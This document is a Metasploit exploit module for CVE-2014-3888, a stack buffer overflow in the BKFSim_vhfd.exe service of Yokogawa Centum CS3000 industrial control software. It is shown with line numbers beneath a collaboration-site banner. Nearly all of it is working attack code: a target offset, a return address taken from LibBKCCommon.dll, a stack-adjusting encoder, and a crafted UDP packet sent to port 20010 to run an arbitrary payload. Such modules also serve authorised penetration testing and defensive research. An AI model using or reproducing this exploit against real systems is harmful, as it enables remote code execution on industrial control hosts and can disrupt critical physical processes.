Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability
16
        exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
17
        logs using functions like vsprintf and memcpy in an insecure way. This module has been
18
        tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
19
      },
20
      'Author'         =>
21
        [
22
          'Redsadic <julian.vilas[at]gmail.com>',
23
          'juan vazquez'
24
        ],
25
      'References'     =>
26
        [
27
          ['CVE', '2014-3888'],
28
          ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],
29
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],
30
          ['URL', 'https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']
31
        ],
32
      'Payload'        =>
33
        {
34
          'Space'    => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)
35
          'DisableNops' => true,
36
          'BadChars' => "\x00",
37
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
38
        },
39
      'Platform'       => 'win',
40
      'Targets'        =>
41
        [
42
          [ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',
43
            {
44
              'Ret'    => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll
45
              'Offset' => 438
46
            }
47
          ],
48
        ],
49
      'DisclosureDate' => '2014-05-23',
50
      'DefaultTarget'  => 0))
51

52
    register_options(
53
      [
54
        Opt::RPORT(20010)
55
      ])
56
  end
57

58
  def exploit
59
    connect_udp
60

61
    sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header
62
    sploit << rand_text(target['Offset'])
63
    sploit << [target.ret].pack("V")
64
    sploit << payload.encoded
65

66
    print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")
67
    udp_sock.put(sploit)
68

69
    disconnect_udp
70
  end
71
end
72

73

74